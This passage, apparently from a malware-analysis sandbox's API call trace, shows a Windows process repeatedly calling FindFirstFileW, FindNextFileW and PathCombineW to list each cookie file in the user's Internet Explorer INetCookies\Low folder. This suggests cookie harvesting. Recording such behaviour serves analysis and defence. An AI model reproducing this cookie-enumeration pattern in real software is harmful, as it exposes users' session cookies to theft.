returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.405] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x46 [0251.405] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", lpDst=0x7aae5c0, nSize=0x46 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned 0x46 [0251.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned 69 [0251.405] lstrlenW (lpString="*.txt") returned 5 [0251.405] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="*.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\*.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\*.txt" [0251.405] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\*.txt", lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0x44067a0 [0251.411] lstrlenW (lpString="0GHTMU6X.txt") returned 12 [0251.411] lstrlenW (lpString="*.txt") returned 5 [0251.411] wcscpy (in: _Dest=0x79c5a48, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.411] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.411] PathCombineW (in: pszDest=0x79c5a48, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="0GHTMU6X.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0GHTMU6X.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0GHTMU6X.txt" [0251.411] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.412] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.412] lstrlenW (lpString="0MDKR34W.txt") returned 12 [0251.412] lstrlenW (lpString="*.txt") returned 5 [0251.412] wcscpy (in: _Dest=0x79c5b58, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.412] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.412] PathCombineW (in: pszDest=0x79c5b58, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="0MDKR34W.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0MDKR34W.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0MDKR34W.txt" [0251.412] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.412] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.412] lstrlenW (lpString="0Z1JIEVI.txt") returned 12 [0251.412] lstrlenW (lpString="*.txt") returned 5 [0251.412] wcscpy (in: _Dest=0x79c5c68, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.412] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.413] PathCombineW (in: pszDest=0x79c5c68, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="0Z1JIEVI.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0Z1JIEVI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0Z1JIEVI.txt" [0251.413] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.413] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.413] lstrlenW (lpString="16DOE15M.txt") returned 12 [0251.413] lstrlenW (lpString="*.txt") returned 5 [0251.413] wcscpy (in: _Dest=0x79c8988, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.413] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.413] PathCombineW (in: pszDest=0x79c8988, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="16DOE15M.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16DOE15M.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16DOE15M.txt" [0251.413] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.413] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.413] lstrlenW (lpString="16Y0X4V7.txt") returned 12 [0251.413] lstrlenW (lpString="*.txt") returned 5 [0251.413] wcscpy (in: _Dest=0x79c8a98, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.413] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.413] PathCombineW (in: pszDest=0x79c8a98, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="16Y0X4V7.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16Y0X4V7.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16Y0X4V7.txt" [0251.413] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.413] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.413] lstrlenW (lpString="1L3KU69N.txt") returned 12 [0251.413] lstrlenW (lpString="*.txt") returned 5 [0251.413] wcscpy (in: _Dest=0x79c8ba8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.413] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.413] PathCombineW (in: pszDest=0x79c8ba8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="1L3KU69N.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1L3KU69N.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1L3KU69N.txt" [0251.413] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.413] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.413] lstrlenW (lpString="1LFQZEOH.txt") returned 12 [0251.413] lstrlenW (lpString="*.txt") returned 5 [0251.414] wcscpy (in: _Dest=0x79c8cb8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.414] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.414] PathCombineW (in: pszDest=0x79c8cb8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="1LFQZEOH.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LFQZEOH.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LFQZEOH.txt" [0251.414] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.414] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.414] lstrlenW (lpString="1LLUY7B7.txt") returned 12 [0251.414] lstrlenW (lpString="*.txt") returned 5 [0251.414] wcscpy (in: _Dest=0x79c8dc8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.414] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.414] PathCombineW (in: pszDest=0x79c8dc8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="1LLUY7B7.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LLUY7B7.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LLUY7B7.txt" [0251.414] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.414] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.414] lstrlenW (lpString="1UYN2RFY.txt") returned 12 [0251.414] lstrlenW (lpString="*.txt") returned 5 [0251.414] wcscpy (in: _Dest=0x79c8ed8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.414] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.414] PathCombineW (in: pszDest=0x79c8ed8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="1UYN2RFY.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1UYN2RFY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1UYN2RFY.txt" [0251.414] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.414] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.414] lstrlenW (lpString="23JC2UTD.txt") returned 12 [0251.414] lstrlenW (lpString="*.txt") returned 5 [0251.414] wcscpy (in: _Dest=0x79c8fe8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.414] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.415] PathCombineW (in: pszDest=0x79c8fe8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="23JC2UTD.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\23JC2UTD.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\23JC2UTD.txt" [0251.415] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.415] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.415] lstrlenW (lpString="2EQ4E2OJ.txt") returned 12 [0251.415] lstrlenW (lpString="*.txt") returned 5 [0251.415] wcscpy (in: _Dest=0x79c9258, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.415] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.415] PathCombineW (in: pszDest=0x79c9258, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="2EQ4E2OJ.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2EQ4E2OJ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2EQ4E2OJ.txt" [0251.415] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.415] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.415] lstrlenW (lpString="2HYILE1O.txt") returned 12 [0251.415] lstrlenW (lpString="*.txt") returned 5 [0251.415] wcscpy (in: _Dest=0x79c9be8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.415] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.415] PathCombineW (in: pszDest=0x79c9be8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="2HYILE1O.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2HYILE1O.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2HYILE1O.txt" [0251.415] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.415] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.415] lstrlenW (lpString="3RW4K76X.txt") returned 12 [0251.415] lstrlenW (lpString="*.txt") returned 5 [0251.415] wcscpy (in: _Dest=0x79c9cf8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.415] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.416] PathCombineW (in: pszDest=0x79c9cf8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="3RW4K76X.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3RW4K76X.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3RW4K76X.txt" [0251.416] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.416] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.416] lstrlenW (lpString="3VVSZ2CO.txt") returned 12 [0251.416] lstrlenW (lpString="*.txt") returned 5 [0251.416] wcscpy (in: _Dest=0x79c9148, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.416] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.416] PathCombineW (in: pszDest=0x79c9148, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="3VVSZ2CO.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3VVSZ2CO.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\3VVSZ2CO.txt" [0251.416] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.416] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.416] lstrlenW (lpString="4MN240WN.txt") returned 12 [0251.416] lstrlenW (lpString="*.txt") returned 5 [0251.416] wcscpy (in: _Dest=0x79c97a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.416] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.416] PathCombineW (in: pszDest=0x79c97a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="4MN240WN.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4MN240WN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4MN240WN.txt" [0251.416] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.416] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.416] lstrlenW (lpString="4O6583I0.txt") returned 12 [0251.416] lstrlenW (lpString="*.txt") returned 5 [0251.416] wcscpy (in: _Dest=0x79c9588, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.416] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.416] PathCombineW (in: pszDest=0x79c9588, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="4O6583I0.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4O6583I0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4O6583I0.txt" [0251.416] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.416] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.416] lstrlenW (lpString="4YWCPPXN.txt") returned 12 [0251.416] lstrlenW (lpString="*.txt") returned 5 [0251.416] wcscpy (in: _Dest=0x79c9ad8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.417] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.417] PathCombineW (in: pszDest=0x79c9ad8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="4YWCPPXN.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4YWCPPXN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4YWCPPXN.txt" [0251.417] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.417] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.417] lstrlenW (lpString="4Z6UDYLY.txt") returned 12 [0251.417] lstrlenW (lpString="*.txt") returned 5 [0251.417] wcscpy (in: _Dest=0x79c9698, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.417] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.417] PathCombineW (in: pszDest=0x79c9698, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="4Z6UDYLY.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4Z6UDYLY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4Z6UDYLY.txt" [0251.417] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.417] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.417] lstrlenW (lpString="5AFMRGRY.txt") returned 12 [0251.417] lstrlenW (lpString="*.txt") returned 5 [0251.417] wcscpy (in: _Dest=0x79c98b8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.417] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.417] PathCombineW (in: pszDest=0x79c98b8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5AFMRGRY.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AFMRGRY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AFMRGRY.txt" [0251.417] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.417] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.417] lstrlenW (lpString="5ARQYMIV.txt") returned 12 [0251.417] lstrlenW (lpString="*.txt") returned 5 [0251.417] wcscpy (in: _Dest=0x79c9e08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.417] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.417] PathCombineW (in: pszDest=0x79c9e08, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5ARQYMIV.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5ARQYMIV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5ARQYMIV.txt" [0251.417] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.417] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.417] lstrlenW (lpString="5AV8L20N.txt") returned 12 [0251.417] lstrlenW (lpString="*.txt") returned 5 [0251.418] wcscpy (in: _Dest=0x79c99c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.418] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.418] PathCombineW (in: pszDest=0x79c99c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="5AV8L20N.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AV8L20N.txt") 